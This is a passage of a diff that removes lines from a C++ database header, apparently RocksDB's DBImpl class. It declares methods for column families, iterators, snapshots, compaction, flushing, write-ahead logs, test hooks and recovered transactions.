-      const std::vector<ColumnFamilyDescriptor>& column_families,
-      std::vector<ColumnFamilyHandle*>* handles) override;
-  virtual Status DropColumnFamily(ColumnFamilyHandle* column_family) override;
-  virtual Status DropColumnFamilies(
-      const std::vector<ColumnFamilyHandle*>& column_families) override;
-
-  // Returns false if key doesn't exist in the database and true if it may.
-  // If value_found is not passed in as null, then return the value if found in
-  // memory. On return, if value was found, then value_found will be set to true
-  // , otherwise false.
-  using DB::KeyMayExist;
-  virtual bool KeyMayExist(const ReadOptions& options,
-                           ColumnFamilyHandle* column_family, const Slice& key,
-                           std::string* value,
-                           bool* value_found = nullptr) override;
-
-  using DB::NewIterator;
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override;
-  virtual Status NewIterators(
-      const ReadOptions& options,
-      const std::vector<ColumnFamilyHandle*>& column_families,
-      std::vector<Iterator*>* iterators) override;
-  ArenaWrappedDBIter* NewIteratorImpl(const ReadOptions& options,
-                                      ColumnFamilyData* cfd,
-                                      SequenceNumber snapshot,
-                                      bool allow_blob = false);
-
-  virtual const Snapshot* GetSnapshot() override;
-  virtual void ReleaseSnapshot(const Snapshot* snapshot) override;
-  using DB::GetProperty;
-  virtual bool GetProperty(ColumnFamilyHandle* column_family,
-                           const Slice& property, std::string* value) override;
-  using DB::GetMapProperty;
-  virtual bool GetMapProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property,
-                              std::map<std::string, double>* value) override;
-  using DB::GetIntProperty;
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) override;
-  using DB::GetAggregatedIntProperty;
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* aggregated_value) override;
-  using DB::GetApproximateSizes;
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) override;
-  using DB::GetApproximateMemTableStats;
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) override;
-  using DB::CompactRange;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) override;
-
-  using DB::CompactFiles;
-  virtual Status CompactFiles(const CompactionOptions& compact_options,
-                              ColumnFamilyHandle* column_family,
-                              const std::vector<std::string>& input_file_names,
-                              const int output_level,
-                              const int output_path_id = -1) override;
-
-  virtual Status PauseBackgroundWork() override;
-  virtual Status ContinueBackgroundWork() override;
-
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) override;
-
-  using DB::SetOptions;
-  Status SetOptions(
-      ColumnFamilyHandle* column_family,
-      const std::unordered_map<std::string, std::string>& options_map) override;
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& options_map) override;
-
-  using DB::NumberLevels;
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) override;
-  using DB::MaxMemCompactionLevel;
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family) override;
-  using DB::Level0StopWriteTrigger;
-  virtual int Level0StopWriteTrigger(
-      ColumnFamilyHandle* column_family) override;
-  virtual const std::string& GetName() const override;
-  virtual Env* GetEnv() const override;
-  using DB::GetOptions;
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const override;
-  using DB::GetDBOptions;
-  virtual DBOptions GetDBOptions() const override;
-  using DB::Flush;
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) override;
-  virtual Status FlushWAL(bool sync) override;
-  virtual Status SyncWAL() override;
-
-  virtual SequenceNumber GetLatestSequenceNumber() const override;
-
-  // Whether there is an active snapshot in range [lower_bound, upper_bound).
-  bool HasActiveSnapshotInRange(SequenceNumber lower_bound,
-                                SequenceNumber upper_bound);
-
-#ifndef ROCKSDB_LITE
-  using DB::ResetStats;
-  virtual Status ResetStats() override;
-  virtual Status DisableFileDeletions() override;
-  virtual Status EnableFileDeletions(bool force) override;
-  virtual int IsFileDeletionsEnabled() const;
-  // All the returned filenames start with "/"
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) override;
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) override;
-
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions&
-          read_options = TransactionLogIterator::ReadOptions()) override;
-  virtual Status DeleteFile(std::string name) override;
-  Status DeleteFilesInRange(ColumnFamilyHandle* column_family,
-                            const Slice* begin, const Slice* end);
-
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* metadata) override;
-
-  // Obtains the meta data of the specified column family of the DB.
-  // Status::NotFound() will be returned if the current DB does not have
-  // any column family match the specified name.
-  // TODO(yhchiang): output parameter is placed in the end in this codebase.
-  virtual void GetColumnFamilyMetaData(
-      ColumnFamilyHandle* column_family,
-      ColumnFamilyMetaData* metadata) override;
-
-  Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                             const Slice* begin, const Slice* end) override;
-
-  Status PromoteL0(ColumnFamilyHandle* column_family,
-                   int target_level) override;
-
-  // Similar to Write() but will call the callback once on the single write
-  // thread to determine whether it is safe to perform the write.
-  virtual Status WriteWithCallback(const WriteOptions& write_options,
-                                   WriteBatch* my_batch,
-                                   WriteCallback* callback);
-
-  // Returns the sequence number that is guaranteed to be smaller than or equal
-  // to the sequence number of any key that could be inserted into the current
-  // memtables. It can then be assumed that any write with a larger(or equal)
-  // sequence number will be present in this memtable or a later memtable.
-  //
-  // If the earliest sequence number could not be determined,
-  // kMaxSequenceNumber will be returned.
-  //
-  // If include_history=true, will also search Memtables in MemTableList
-  // History.
-  SequenceNumber GetEarliestMemTableSequenceNumber(SuperVersion* sv,
-                                                   bool include_history);
-
-  // For a given key, check to see if there are any records for this key
-  // in the memtables, including memtable history.  If cache_only is false,
-  // SST files will also be checked.
-  //
-  // If a key is found, *found_record_for_key will be set to true and
-  // *seq will be set to the stored sequence number for the latest
-  // operation on this key or kMaxSequenceNumber if unknown.
-  // If no key is found, *found_record_for_key will be set to false.
-  //
-  // Note: If cache_only=false, it is possible for *seq to be set to 0 if
-  // the sequence number has been cleared from the record.  If the caller is
-  // holding an active db snapshot, we know the missing sequence must be less
-  // than the snapshot's sequence number (sequence numbers are only cleared
-  // when there are no earlier active snapshots).
-  //
-  // If NotFound is returned and found_record_for_key is set to false, then no
-  // record for this key was found.  If the caller is holding an active db
-  // snapshot, we know that no key could have existing after this snapshot
-  // (since we do not compact keys that have an earlier snapshot).
-  //
-  // Returns OK or NotFound on success,
-  // other status on unexpected error.
-  // TODO(andrewkr): this API need to be aware of range deletion operations
-  Status GetLatestSequenceForKey(SuperVersion* sv, const Slice& key,
-                                 bool cache_only, SequenceNumber* seq,
-                                 bool* found_record_for_key,
-                                 bool* is_blob_index = nullptr);
-
-  using DB::IngestExternalFile;
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& ingestion_options) override;
-
-  virtual Status VerifyChecksum() override;
-
-#endif  // ROCKSDB_LITE
-
-  // Similar to GetSnapshot(), but also lets the db know that this snapshot
-  // will be used for transaction write-conflict checking.  The DB can then
-  // make sure not to compact any keys that would prevent a write-conflict from
-  // being detected.
-  const Snapshot* GetSnapshotForWriteConflictBoundary();
-
-  // checks if all live files exist on file system and that their file sizes
-  // match to our in-memory records
-  virtual Status CheckConsistency();
-
-  virtual Status GetDbIdentity(std::string& identity) const override;
-
-  Status RunManualCompaction(ColumnFamilyData* cfd, int input_level,
-                             int output_level, uint32_t output_path_id,
-                             const Slice* begin, const Slice* end,
-                             bool exclusive,
-                             bool disallow_trivial_move = false);
-
-  // Return an internal iterator over the current state of the database.
-  // The keys of this iterator are internal keys (see format.h).
-  // The returned iterator should be deleted when no longer needed.
-  InternalIterator* NewInternalIterator(
-      Arena* arena, RangeDelAggregator* range_del_agg,
-      ColumnFamilyHandle* column_family = nullptr);
-
-#ifndef NDEBUG
-  // Extra methods (for testing) that are not in the public DB interface
-  // Implemented in db_impl_debug.cc
-
-  // Compact any files in the named level that overlap [*begin, *end]
-  Status TEST_CompactRange(int level, const Slice* begin, const Slice* end,
-                           ColumnFamilyHandle* column_family = nullptr,
-                           bool disallow_trivial_move = false);
-
-  void TEST_HandleWALFull();
-
-  bool TEST_UnableToFlushOldestLog() {
-    return unable_to_flush_oldest_log_;
-  }
-
-  bool TEST_IsLogGettingFlushed() {
-    return alive_log_files_.begin()->getting_flushed;
-  }
-
-  Status TEST_SwitchMemtable(ColumnFamilyData* cfd = nullptr);
-
-  // Force current memtable contents to be flushed.
-  Status TEST_FlushMemTable(bool wait = true,
-                            ColumnFamilyHandle* cfh = nullptr);
-
-  // Wait for memtable compaction
-  Status TEST_WaitForFlushMemTable(ColumnFamilyHandle* column_family = nullptr);
-
-  // Wait for any compaction
-  Status TEST_WaitForCompact();
-
-  // Return the maximum overlapping data (in bytes) at next level for any
-  // file at a level >= 1.
-  int64_t TEST_MaxNextLevelOverlappingBytes(ColumnFamilyHandle* column_family =
-                                                nullptr);
-
-  // Return the current manifest file no.
-  uint64_t TEST_Current_Manifest_FileNo();
-
-  // get total level0 file size. Only for testing.
-  uint64_t TEST_GetLevel0TotalSize();
-
-  void TEST_GetFilesMetaData(ColumnFamilyHandle* column_family,
-                             std::vector<std::vector<FileMetaData>>* metadata);
-
-  void TEST_LockMutex();
-
-  void TEST_UnlockMutex();
-
-  // REQUIRES: mutex locked
-  void* TEST_BeginWrite();
-
-  // REQUIRES: mutex locked
-  // pass the pointer that you got from TEST_BeginWrite()
-  void TEST_EndWrite(void* w);
-
-  uint64_t TEST_MaxTotalInMemoryState() const {
-    return max_total_in_memory_state_;
-  }
-
-  size_t TEST_LogsToFreeSize();
-
-  uint64_t TEST_LogfileNumber();
-
-  uint64_t TEST_total_log_size() const { return total_log_size_; }
-
-  // Returns column family name to ImmutableCFOptions map.
-  Status TEST_GetAllImmutableCFOptions(
-      std::unordered_map<std::string, const ImmutableCFOptions*>* iopts_map);
-
-  // Return the lastest MutableCFOptions of a column family
-  Status TEST_GetLatestMutableCFOptions(ColumnFamilyHandle* column_family,
-                                        MutableCFOptions* mutable_cf_options);
-
-  Cache* TEST_table_cache() { return table_cache_.get(); }
-
-  WriteController& TEST_write_controler() { return write_controller_; }
-
-  uint64_t TEST_FindMinLogContainingOutstandingPrep();
-  uint64_t TEST_FindMinPrepLogReferencedByMemTable();
-
-  int TEST_BGCompactionsAllowed() const;
-  int TEST_BGFlushesAllowed() const;
-
-#endif  // NDEBUG
-
-  struct BGJobLimits {
-    int max_flushes;
-    int max_compactions;
-  };
-  // Returns maximum background flushes and compactions allowed to be scheduled
-  BGJobLimits GetBGJobLimits() const;
-  // Need a static version that can be called during SanitizeOptions().
-  static BGJobLimits GetBGJobLimits(int max_background_flushes,
-                                    int max_background_compactions,
-                                    int max_background_jobs,
-                                    bool parallelize_compactions);
-
-  // move logs pending closing from job_context to the DB queue and
-  // schedule a purge
-  void ScheduleBgLogWriterClose(JobContext* job_context);
-
-  uint64_t MinLogNumberToKeep();
-
-  // Returns the list of live files in 'live' and the list
-  // of all files in the filesystem in 'candidate_files'.
-  // If force == false and the last call was less than
-  // db_options_.delete_obsolete_files_period_micros microseconds ago,
-  // it will not fill up the job_context
-  void FindObsoleteFiles(JobContext* job_context, bool force,
-                         bool no_full_scan = false);
-
-  // Diffs the files listed in filenames and those that do not
-  // belong to live files are posibly removed. Also, removes all the
-  // files in sst_delete_files and log_delete_files.
-  // It is not necessary to hold the mutex when invoking this method.
-  void PurgeObsoleteFiles(const JobContext& background_contet,
-                          bool schedule_only = false);
-
-  void SchedulePurge();
-
-  ColumnFamilyHandle* DefaultColumnFamily() const override;
-
-  const SnapshotList& snapshots() const { return snapshots_; }
-
-  const ImmutableDBOptions& immutable_db_options() const {
-    return immutable_db_options_;
-  }
-
-  void CancelAllBackgroundWork(bool wait);
-
-  // Find Super version and reference it. Based on options, it might return
-  // the thread local cached one.
-  // Call ReturnAndCleanupSuperVersion() when it is no longer needed.
-  SuperVersion* GetAndRefSuperVersion(ColumnFamilyData* cfd);
-
-  // Similar to the previous function but looks up based on a column family id.
-  // nullptr will be returned if this column family no longer exists.
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.
-  SuperVersion* GetAndRefSuperVersion(uint32_t column_family_id);
-
-  // Un-reference the super version and return it to thread local cache if
-  // needed. If it is the last reference of the super version. Clean it up
-  // after un-referencing it.
-  void ReturnAndCleanupSuperVersion(ColumnFamilyData* cfd, SuperVersion* sv);
-
-  // Similar to the previous function but looks up based on a column family id.
-  // nullptr will be returned if this column family no longer exists.
-  // REQUIRED: this function should only be called on the write thread.
-  void ReturnAndCleanupSuperVersion(uint32_t colun_family_id, SuperVersion* sv);
-
-  // REQUIRED: this function should only be called on the write thread or if the
-  // mutex is held.  Return value only valid until next call to this function or
-  // mutex is released.
-  ColumnFamilyHandle* GetColumnFamilyHandle(uint32_t column_family_id);
-
-  // Same as above, should called without mutex held and not on write thread.
-  ColumnFamilyHandle* GetColumnFamilyHandleUnlocked(uint32_t column_family_id);
-
-  // Returns the number of currently running flushes.
-  // REQUIREMENT: mutex_ must be held when calling this function.
-  int num_running_flushes() {
-    mutex_.AssertHeld();
-    return num_running_flushes_;
-  }
-
-  // Returns the number of currently running compactions.
-  // REQUIREMENT: mutex_ must be held when calling this function.
-  int num_running_compactions() {
-    mutex_.AssertHeld();
-    return num_running_compactions_;
-  }
-
-  const WriteController& write_controller() { return write_controller_; }
-
-  InternalIterator* NewInternalIterator(const ReadOptions&,
-                                        ColumnFamilyData* cfd,
-                                        SuperVersion* super_version,
-                                        Arena* arena,
-                                        RangeDelAggregator* range_del_agg);
-
-  // hollow transactions shell used for recovery.
-  // these will then be passed to TransactionDB so that
-  // locks can be reacquired before writing can resume.
-  struct RecoveredTransaction {
-    uint64_t log_number_;
-    std::string name_;
-    WriteBatch* batch_;
-    explicit RecoveredTransaction(const uint64_t log, const std::string& name,
-                                  WriteBatch* batch)
-        : log_number_(log), name_(name), batch_(batch) {}
-
-    ~RecoveredTransaction() { delete batch_; }
-  };
-
-  bool allow_2pc() const { return immutable_db_options_.allow_2pc; }
-
-  std::unordered_map<std::string, RecoveredTransaction*>
-  recovered_transactions() {
-    return recovered_transactions_;
-  }
-
-  RecoveredTransaction* GetRecoveredTransaction(const std::string& name) {
-    auto it = recovered_transactions_.find(name);
-    if (it == recovered_transactions_.end()) {
-      return nullptr;
-    } else {
-      return it->second;
-    }
-  }
-
-  void InsertRecoveredTransaction(const uint64_t log, const std::string& name,
-                                  WriteBatch* batch) {
-    recovered_transactions_[name] = new RecoveredTransaction(log, name, batch);
-    MarkLogAsContainingPrepSection(log);
-  }
-
-  void DeleteRecoveredTransaction(const std::string& name) {
-    auto it = recovered_transactions_.find(name);
-    assert(it != recovered_transactions_.end());
-    auto* trx = it->second;
-    recovered_transactions_.erase(it);
-    MarkLogAsHavingPrepSectionFlushed(trx->log_number_);
-    delete trx;
-  }
-
-  void DeleteAllRecoveredTransactions() {
-    for (auto it = recovered_transactions_.begin();
-         it != recovered_transactions_.end(); it++) {
-      delete it->second;
-    }
-    recovered_transactions_.clear();
-  }
-
-  void MarkLogAsHavingPrepSectionFlushed(uint64_t log);
-  void MarkLogAsContainingPrepSection(uint64_t log);
-  void AddToLogsToFreeQueue(log::Writer* log_writer) {
-    logs_to_free_queue_.push_back(log_writer);
-  }
-  InstrumentedMutex* mutex() { return &mutex_; }
-
-  Status NewDB();
-
- protected:
-  Env* const env_;
-  const std::string dbname_;
-  unique_ptr<VersionSet> versions_;
-  const DBOptions initial_db_options_;
-  const ImmutableDBOptions immutable_db_options_;
-  MutableDBOptions mutable_db_options_;
-  Statistics* stats_;
-  std::unordered_map<std::string, RecoveredTransaction*>
-      recovered_transactions_;
-
-  // Except in DB::Open(), WriteOptionsFile can only be called when:
-  // Persist options to options file.
-  // If need_mutex_lock = false, the method will lock DB mutex.
-  // If need_enter_write_thread = false, the method will enter write thread.
-  Status WriteOptionsFile(bool need_mutex_lock, bool need_enter_write_thread);
-
-  // The following two functions can only be called when:
-  // 1. WriteThread::Writer::EnterUnbatched() is used.
-  // 2. db_mutex is NOT held
-  Status RenameTempFileToOptionsFile(const std::string& file_name);
-  Status DeleteObsoleteOptionsFiles();
-
-  void NotifyOnFlushBegin(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                          const MutableCFOptions& mutable_cf_options,
-                          int job_id, TableProperties prop);
-
-  void NotifyOnFlushCompleted(ColumnFamilyData* cfd, FileMetaData* file_meta,
-                              const MutableCFOptions& mutable_cf_options,
-                              int job_id, TableProperties prop);
-
-  void NotifyOnCompactionCompleted(ColumnFamilyData* cfd,
-                                   Compaction *c, const Status &st,
-                                   const CompactionJobStats& job_stats,
-                                   int job_id);
-  void NotifyOnMemTableSealed(ColumnFamilyData* cfd,
-                              const MemTableInfo& mem_table_info);
-
-#ifndef ROCKSDB_LITE
-  void NotifyOnExternalFileIngested(
-      ColumnFamilyData* cfd, const ExternalSstFileIngestionJob& ingestion_job);
-#endif  // !ROCKSDB_LITE
-
-  void NewThreadStatusCfInfo(ColumnFamilyData* cfd) const;
-
-  void EraseThreadStatusCfInfo(ColumnFamilyData* cfd) const;
-
-  void EraseThreadStatusDbInfo() const;
-
-  Status WriteImpl(const WriteOptions& options, WriteBatch* updates,
-                   WriteCallback* callback = nullptr,
-                   uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                   bool disable_memtable = false, uint64_t* seq_used = nullptr);
-
-  Status PipelinedWriteImpl(const WriteOptions& options, WriteBatch* updates,
-                            WriteCallback* callback = nullptr,
-                            uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                            bool disable_memtable = false,
-                            uint64_t* seq_used = nullptr);
-
-  Status WriteImplWALOnly(const WriteOptions& options, WriteBatch* updates,
-                          WriteCallback* callback = nullptr,
-                          uint64_t* log_used = nullptr, uint64_t log_ref = 0,
-                          uint64_t* seq_used = nullptr);
-
-  uint64_t FindMinLogContainingOutstandingPrep();
-  uint64_t FindMinPrepLogReferencedByMemTable();
-
- private:
-  friend class DB;
-  friend class InternalStats;
-  friend class PessimisticTransaction;
-  friend class WriteCommittedTxn;
-  friend class WritePreparedTxn;
-#ifndef ROCKSDB_LITE
-  friend class ForwardIterator;
-#endif
-  friend struct SuperVersion;
-  friend class CompactedDBImpl;
-#ifndef NDEBUG
-  friend class DBTest2_ReadCallbackTest_Test;
-  friend class XFTransactionWriteHandler;
-  friend class DBBlobIndexTest;
-#endif
-  struct CompactionState;
-
-  struct WriteContext {
-    autovector<SuperVersion*> superversions_to_free_;
-    autovector<MemTable*> memtables_to_free_;
-
-    ~WriteContext() {
-      for (auto& sv : superversions_to_free_) {
-        delete sv;
-      }
-      for (auto& m : memtables_to_free_) {
-        delete m;
-      }
-    }
-  };
-
-  struct PrepickedCompaction;
-  struct PurgeFileInfo;
-
-  // Recover the descriptor from persistent storage.  May do a significant
-  // amount of work to recover recently logged updates.  Any changes to
-  // be made to the descriptor are added to *edit.
-  Status Recover(const std::vector<ColumnFamilyDescriptor>& column_families,
-                 bool read_only = false, bool error_if_log_file_exist = false,
-                 bool error_if_data_exists_in_logs = false);
-
-  void MaybeIgnoreError(Status* s) const;
-
-  const Status CreateArchivalDirectory();
-
-  Status CreateColumnFamilyImpl(const ColumnFamilyOptions& cf_options,
-                                const std::string& cf_name,
-                                ColumnFamilyHandle** handle);
-
-  Status DropColumnFamilyImpl(ColumnFamilyHandle* column_family);
-
-  // Delete any unneeded files and stale in-memory entries.
-  void DeleteObsoleteFiles();
-  // Delete obsolete files and log status and information of file deletion
-  void DeleteObsoleteFileImpl(Status file_deletion_status, int job_id,
-                              const std::string& fname, FileType type,
-                              uint64_t number, uint32_t path_id);
-
-  // Background process needs to call
-  //     auto x = CaptureCurrentFileNumberInPendingOutputs()
-  //     auto file_num = versions_->NewFileNumber();
-  //     <do something>
-  //     ReleaseFileNumberFromPendingOutputs(x)
-  // This will protect any file with number `file_num` or greater from being
-  // deleted while <do something> is running.
-  // -----------
-  // This function will capture current file number and append it to
-  // pending_outputs_. This will prevent any background process to delete any
-  // file created after this point.
-  std::list<uint64_t>::iterator CaptureCurrentFileNumberInPendingOutputs();
-  // This function should be called with the result of
-  // CaptureCurrentFileNumberInPendingOutputs(). It then marks that any file
-  // created between the calls CaptureCurrentFileNumberInPendingOutputs() and
-  // ReleaseFileNumberFromPendingOutputs() can now be deleted (if it's not live
-  // and blocked by any other pending_outputs_ calls)
-  void ReleaseFileNumberFromPendingOutputs(std::list<uint64_t>::iterator v);
-
-  Status SyncClosedLogs(JobContext* job_context);
-
-  // Flush the in-memory write buffer to storage.  Switches to a new
-  // log-file/memtable and writes a new descriptor iff successful.
-  Status FlushMemTableToOutputFile(ColumnFamilyData* cfd,
-                                   const MutableCFOptions& mutable_cf_options,
-                                   bool* madeProgress, JobContext* job_context,
-                                   LogBuffer* log_buffer);
-
-  // REQUIRES: log_numbers are sorted in ascending order
-  Status RecoverLogFiles(const std::vector<uint64_t>& log_numbers,
-                         SequenceNumber* next_sequence, bool read_only);
-
-  // The following two methods are used to flush a memtable to
-  // storage. The first one is used at database RecoveryTime (when the
-  // database is opened) and is heavyweight because it holds the mutex
-  // for the entire period. The second method WriteLevel0Table supports
-  // concurrent flush memtables to storage.
-  Status WriteLevel0TableForRecovery(int job_id, ColumnFamilyData* cfd,
-                                     MemTable* mem, VersionEdit* edit);
-
-  // num_bytes: for slowdown case, delay time is calculated based on
-  //            `num_bytes` going through.
-  Status DelayWrite(uint64_t num_bytes, const WriteOptions& write_options);
-
-  Status ThrottleLowPriWritesIfNeeded(const WriteOptions& write_options,
-                                      WriteBatch* my_batch);
-
-  Status ScheduleFlushes(WriteContext* context);
-
-  Status SwitchMemtable(ColumnFamilyData* cfd, WriteContext* context);
-
-  // Force current memtable contents to be flushed.
-  Status FlushMemTable(ColumnFamilyData* cfd, const FlushOptions& options,
-                       bool writes_stopped = false);
-
-  // Wait for memtable flushed
-  Status WaitForFlushMemTable(ColumnFamilyData* cfd);
-
-  // REQUIRES: mutex locked
-  Status HandleWALFull(WriteContext* write_context);
-
-  // REQUIRES: mutex locked
-  Status HandleWriteBufferFull(WriteContext* write_context);
-
-  // REQUIRES: mutex locked
-  Status PreprocessWrite(const WriteOptions& write_options, bool* need_log_sync,
-                         WriteContext* write_context);
-
-  WriteBatch* MergeBatch(const WriteThread::WriteGroup& write_group,
-                         WriteBatch* tmp_batch, size_t* write_with_wal);
-
-  Status WriteToWAL(const WriteBatch& merged_batch, log::Writer* log_writer,
-                    uint64_t* log_used, uint64_t* log_size);
-
-  Status WriteToWAL(const WriteThread::WriteGroup& write_group,
-                    log::Writer* log_writer, uint64_t* log_used,
-                    bool need_log_sync, bool need_log_dir_sync,
-                    SequenceNumber sequence);
-
-  Status ConcurrentWriteToWAL(const WriteThread::WriteGroup& write_group,
-                              uint64_t* log_used, SequenceNumber* last_sequence,
-                              int total_count);
-
-  // Used by WriteImpl to update bg_error_ if paranoid check is enabled.
-  void WriteCallbackStatusCheck(const Status& status);
-
-  // Used by WriteImpl to update bg_error_ in case of memtable insert error.
-  void MemTableInsertStatusCheck(const Status& memtable_insert_status);
-
-#ifndef ROCKSDB_LITE
-
-  Status CompactFilesImpl(const CompactionOptions& compact_options,
-                          ColumnFamilyData* cfd, Version* version,
-                          const std::vector<std::string>& input_file_names,
-                          const int output_level, int output_path_id,
-                          JobContext* job_context, LogBuffer* log_buffer);
-
-  // Wait for current IngestExternalFile() calls to finish.
-  // REQUIRES: mutex_ held
-  void WaitForIngestFile();
-
-#else
-  // IngestExternalFile is not supported in ROCKSDB_LITE so this function
-  // will be no-op
-  void WaitForIngestFile() {}
-#endif  // ROCKSDB_LITE
-
-  ColumnFamilyData* GetColumnFamilyDataByName(const std::string& cf_name);
-
-  void MaybeScheduleFlushOrCompaction();
-  void SchedulePendingFlush(ColumnFamilyData* cfd);
-  void SchedulePendingCompaction(ColumnFamilyData* cfd);
-  void SchedulePendingPurge(std::string fname, FileType type, uint64_t number,
-                            uint32_t path_id, int job_id);
-  static void BGWorkCompaction(void* arg);
-  // Runs a pre-chosen universal compaction involving bottom level in a
-  // separate, bottom-pri thread pool.
-  static void BGWorkBottomCompaction(void* arg);
-  static void BGWorkFlush(void* db);
-  static void BGWorkPurge(void* arg);
-  static void UnscheduleCallback(void* arg);
-  void BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction,
-                                Env::Priority bg_thread_pri);
-  void BackgroundCallFlush();
-  void BackgroundCallPurge();
-  Status BackgroundCompaction(bool* madeProgress, JobContext* job_context,
-                              LogBuffer* log_buffer,
-                              PrepickedCompaction* prepicked_compaction);
-  Status BackgroundFlush(bool* madeProgress, JobContext* job_context,
-                         LogBuffer* log_buffer);
-
-  void PrintStatistics();
-
-  // dump rocksdb.stats to LOG
-  void MaybeDumpStats();
-
-  // Return the minimum empty level that could hold the total data in the
-  // input level. Return the input level, if such level could not be found.
-  int FindMinimumEmptyLevelFitting(ColumnFamilyData* cfd,
-      const MutableCFOptions& mutable_cf_options, int level);
-
-  // Move the files in the input level to the target level.
-  // If target_level < 0, automatically calculate the minimum level that could
-  // hold the data set.
-  Status ReFitLevel(ColumnFamilyData* cfd, int level, int target_level = -1);
-
-  // helper functions for adding and removing from flush & compaction queues
-  void AddToCompactionQueue(ColumnFamilyData* cfd);
-  ColumnFamilyData* PopFirstFromCompactionQueue();
-  void AddToFlushQueue(ColumnFamilyData* cfd);
-  ColumnFamilyData* PopFirstFromFlushQueue();
-
-  // helper function to call after some of the logs_ were synced
-  void MarkLogsSynced(uint64_t up_to, bool synced_dir, const Status& status);
-
-  const Snapshot* GetSnapshotImpl(bool is_write_conflict_boundary);
-
-  uint64_t GetMaxTotalWalSize() const;
-
-  // table_cache_ provides its own synchronization
-  std::shared_ptr<Cache> table_cache_;
-
-  // Lock over the persistent DB state.  Non-nullptr iff successfully acquired.
-  FileLock* db_lock_;
-
-  // In addition to mutex_, log_write_mutex_ protected writes to logs_ and
-  // logfile_number_. With concurrent_prepare it also protects alive_log_files_,
-  // and log_empty_. Refer to the definition of each variable below for more
-  // details.
-  InstrumentedMutex log_write_mutex_;
-  // State below is protected by mutex_
-  // With concurrent_prepare enabled, some of the variables that accessed during
-  // WriteToWAL need different synchronization: log_empty_, alive_log_files_,
-  // logs_, logfile_number_. Refer to the definition of each variable below for
-  // more description.
-  mutable InstrumentedMutex mutex_;
-
-  std::atomic<bool> shutting_down_;
-  // This condition variable is signaled on these conditions:
-  // * whenever bg_compaction_scheduled_ goes down to 0
-  // * if AnyManualCompaction, whenever a compaction finishes, even if it hasn't
-  // made any progress
-  // * whenever a compaction made any progress
-  // * whenever bg_flush_scheduled_ or bg_purge_scheduled_ value decreases
-  // (i.e. whenever a flush is done, even if it didn't make any progress)
-  // * whenever there is an error in background purge, flush or compaction
-  // * whenever num_running_ingest_file_ goes to 0.
-  InstrumentedCondVar bg_cv_;
-  // Writes are protected by locking both mutex_ and log_write_mutex_, and reads
-  // must be under either mutex_ or log_write_mutex_. Since after ::Open,
-  // logfile_number_ is currently updated only in write_thread_, it can be read
-  // from the same write_thread_ without any locks.
-  uint64_t logfile_number_;
-  std::deque<uint64_t>
-      log_recycle_files;  // a list of log files that we can recycle
-  bool log_dir_synced_;
-  // Without concurrent_prepare, read and writes to log_empty_ are protected by
-  // mutex_. Since it is currently updated/read only in write_thread_, it can be
-  // accessed from the same write_thread_ without any locks. With
-  // concurrent_prepare writes, where it can be updated in different threads,
-  // read and writes are protected by log_write_mutex_ instead. This is to avoid
-  // expesnive mutex_ lock during WAL write, which update log_empty_.
-  bool log_empty_;
-  ColumnFamilyHandleImpl* default_cf_handle_;
-  InternalStats* default_cf_internal_stats_;
-  unique_ptr<ColumnFamilyMemTablesImpl> column_family_memtables_;
-  struct LogFileNumberSize {
-    explicit LogFileNumberSize(uint64_t _number)
-        : number(_number) {}
-    void AddSize(uint64_t new_size) { size += new_size; }
-    uint64_t number;
-    uint64_t size = 0;
-    bool getting_flushed = false;
-  };
-  struct LogWriterNumber {
-    // pass ownership of _writer
-    LogWriterNumber(uint64_t _number, log::Writer* _writer)
-        : number(_number), writer(_writer) {}
-
-    log::Writer* ReleaseWriter() {
-      auto* w = writer;
-      writer = nullptr;
-      return w;
-    }
-    void ClearWriter() {
-      delete writer;
-      writer = nullptr;
-    }
-
-    uint64_t number;
-    // Visual Studio doesn't support deque's member to be noncopyable because
-    // of a unique_ptr as a member.
-    log::Writer* writer;  // own
-    // true for some prefix of logs_
-    bool getting_synced = false;
-  };
-  // Without concurrent_prepare, read and writes to alive_log_files_ are
-  // protected by mutex_. However since back() is never popped, and push_back()
-  // is done only from write_thread_, the same thread can access the item
-  // reffered by back() without mutex_. With concurrent_prepare_, writes
-  // are protected by locking both mutex_ and log_write_mutex_, and reads must
-  // be under either mutex_ or log_write_mutex_.
-  std::deque<LogFileNumberSize> alive_log_files_;
-  // Log files that aren't fully synced, and the current log file.
-  // Synchronization:
-  //  - push_back() is done from write_thread_ with locked mutex_ and
-  //  log_write_mutex_
-  //  - pop_front() is done from any thread with locked mutex_ and
-  //  log_write_mutex_
-  //  - reads are done with either locked mutex_ or log_write_mutex_
-  //  - back() and items with getting_synced=true are not popped,
-  //  - The same thread that sets getting_synced=true will reset it.
-  //  - it follows that the object referred by back() can be safely read from
